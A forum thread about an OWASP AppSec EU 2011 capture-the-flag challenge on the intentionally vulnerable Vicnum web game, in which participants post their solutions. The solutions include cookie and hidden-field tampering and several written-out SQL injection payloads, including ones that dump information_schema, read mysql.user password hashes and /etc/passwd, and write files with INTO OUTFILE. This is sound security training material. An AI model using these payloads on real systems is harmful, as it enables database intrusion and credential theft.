OWASP AppSec EU 2011 - First Challenge Released!

fcerullo

Introduction

As some of you might know, Vicnum is an OWASP project which consists of a flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. The tool could also be used by those setting up 'capture the flag' exercises or by those who just want to have some fun with web assessments. The Vicnum project was developed for educational purposes by Mordecai Kraushar from Ciphertechs.

For today, we have prepared a customised version of Vicnum The Game that contains several exercises for your enjoyment.

The Game

The computer will think of a three digit number with unique digits. After you attempt to guess the number, the computer will tell you how many of your digits match and how many are in the right position. Keeping on submitting three digit numbers until you have guessed the computer's number.

In order to win an free ticket to AppSec EU 2011 you need to solve the following exercises of Vicnum The Game.

- Hack the game: Have a guess count of zero and a guess value > 999
- Hack the database: Find the Vicnum player with the worst possible score (if there is a tie find the older record). Place another record in the database with that player's name concatenated to your name and with a positive score.

Once you solve the exercises, please send us an email to ireland@owasp.org with your full name and details on how you accomplished this goal.

The first one who solves these exercises gets a free ticket to OWASP AppSec EU 2011!

Please visit http://www.appseceu.org/?page_id=175 to find out further details about the challenge.

A big THANKS goes to Mordecai for setting up and customizing the challenge.

Thank you and best of luck everyone!

Fabio Cerullo

dlofnep

Brilliant.

Going to give it a shot now

h57xiucj2z946q

Done, that was pretty fun.

Went off on the wrong path for ages. Dunno if that other weakness is misleading intentionally :-P

dlofnep

There's a few flaws. Made it to the perfect game list: http://vicnum.ciphertechs.com/top.php

I guess I need to keep at it to make it to the hacked list. I've a few more ideas and flaws I'm working on

dlofnep

Right, have all of the players and scores listed.. nearly there (I think..)

dlofnep

Got onto the hacked database list. I was totally reading the question wrong what it was asking!! Read the questions properly, otherwise you'll spend an hour on over-complicated crap like I did!

h57xiucj2z946q

Cool, so you only got 1 left to do?

dlofnep

Yup - shouldn't be a problem.. There's actually an unintentional flaw in the game. I sent you on a message fcerullo. Might be worth having a look at.

dlofnep

Pow Got all 3 there.

h57xiucj2z946q

sweet

dlofnep

As a potato.

Redshift

Twas fun, thanks for setting it up

dlofnep

Congrats Redshift.

dlofnep

I wouldn't post any hints in this thread RS. Drop me a message if you need any confirmations on stuff. Just incase.

Redshift

dlofnep wrote: »

I wouldn't post any hints in this thread RS. Drop me a message if you need any confirmations on stuff. Just incase.

Soz,
I tried to be as vague as possible but I removed it just in case, the mention of three items to do had me confused is all.

dlofnep

Me too Have to re-read the questions!

fcerullo

Well done everyone! I'm glad you enjoyed the challenge and there are more to come in the next few months.

Steve van der Baan (@vdbaan) from Netherlands was the lucky winner of a free ticket to AppSec EU 2011 (http://www.appseceu.org)

Here is how he hacked the Vicnum game & database:

“I first started up Burp as proxy to help me with this endavor. I clicked all the links and tried a series of numbers to see what are all the possible pages that are touched and what responses they give.

I discovered that the page ‘vicnum4.php’ contained the information which was entered in the database, this was done throught the cookies. I added my info in the cookies (Milano=>name(fleki), Brussels=>guess count (0), Geneva=>number(1984) ), and had the first stage done.

Next I had to find which user had the lowest score. I saw that the search page had the player as parameter. this was vulnerable for sql injection. I added the string ‘+or+’q'=’q and got a list of all entries in the database. This showed which user had the lowest score (appseceu has guessed 123 in -2147483648 guess(es) on 2011-02-18 09:10:35 ) I used the page ‘vicnum4′ again to enter the required info into the database (appseceufleki,1,123) and I was done”

We are going to publish one challenge the 21st of each month until the conference in June.

Thanks,

Fabio Cerullo

dlofnep

I went about my SQLi a bit differently.

Here's my solution if anyone is interested.

The first part of the game was easy - It simply involved me editing the form oldguess value via firebug to be empty prior to submitting the guess. I circled through 0-9 to get the numbers for each column, so I knew the final number prior to submitting.

The second part of the game followed on from the first, but this time - I changed the cnt value in the forum to 0, and then used tamper-data (firefox addon) to change the numerical value to one higher than 999 (In this case, 1337).

The final part of the challenge was simple enough. I used SQL injection to list the players. The Server version was MySQL 5, so I knew I had access to the information_schema db.

@version

@version-- -


5.0.51a-3ubuntu5.1


I listed all tables first in the usable database with the following injection.

value' union select 1,2,3,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()-- -

This gave me the results table.

I then listed all the columns that existed within the results table.

value' union select 1,2,3,group_concat(column_name) FROM information_schema.columns WHERE table_name=CHAR(114, 101, 115, 117, 108, 116, 115)-- -

1 has guessed 2 in 3 guess(es) on idnum,name,guess,count,tod


Then it was just a matter of listing all the data within the results table.

value' union select 1,2,3,concat(idnum,0x3a,name,0x3a,guess,0x3a,count,0x3a,tod) FROM results-- -

Not going to post the results obviously for brevity

I then prepended the weakest username (appseceu) to my username (dlofnep). Then it was just a matter of rinse and repeating the previous steps, changing the username to appseceudlofnep instead of dlofnep when cracking the game.

h57xiucj2z946q

Also I used Tamper Data to modify POST data, instead of the cookie route. Seems just as quick.
Also the number you are trying to guess is base64 encoded.

# Get mysql hashs, seems like they don't want us to break these
' UNION ALL SELECT 1,2,user,password FROM mysql.user#

' UNION ALL SELECT 1,2,3,load_file('/etc/passwd')#

# get all tables, and column
' UNION ALL SELECT 1,table_schema,table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'#

# get worst score
' UNION ALL SELECT name,guess,count,tod FROM results ORDER BY count#


# Find web-root
' UNION SELECT 1,2,3,4 INTO OUTFILE 'damo.txt'#

chuckleberryfin

I wanted to add my own reply here for the sql injection, as it seems to be the lazy way of doing things:

I used the search box on the front page of the challenge site and entered:

';

This gave me:

You have requested results for Vicnum player '; :ERROR in SELECT name,guess,count,tod FROM results WHERE results.name = '';' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';'' at line 1

Which was all I needed, I then used the following paramters in the name box on the search page:

x' or count=(select min(count) from results) or name = 'y

Which produced the SQL query:

SELECT name,guess,count,tod FROM results WHERE results.name = 'x' or count=(select min(count) from results) or name = 'y';

Which gave me the worst scored player in the db...so laziness huh?
I think it's great.

nemo

Redshift

It's interesting to see the differing approaches people take to something like this.
My solution to first solve the number by going though each colum in sequence which revealed the computer number fairly quickly.

I then used groundspeed to view the hidden form values on the submit page. Changed the count value to 0 checked, I noted the other viewstate value and suspected that this was the computer number encoded, a quick base64 decode revealed this to be the case and the value was replaced with the encoded value I choose and submitted, job done.

For the next part I went to the search for player input box and entered

'

which resulted in

You have requested results for Vicnum player ' :ERROR in SELECT name,guess,count,tod FROM results WHERE results.name = ''' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

Revealing that this input was unsanitised and vulnerable to SQL Injection

The SQL injection I used was

' OR 'a'='a

Which dumped the database onscreen.

After finding the user with the lowest score I went back to the submit page
and entered another record with the prepended name.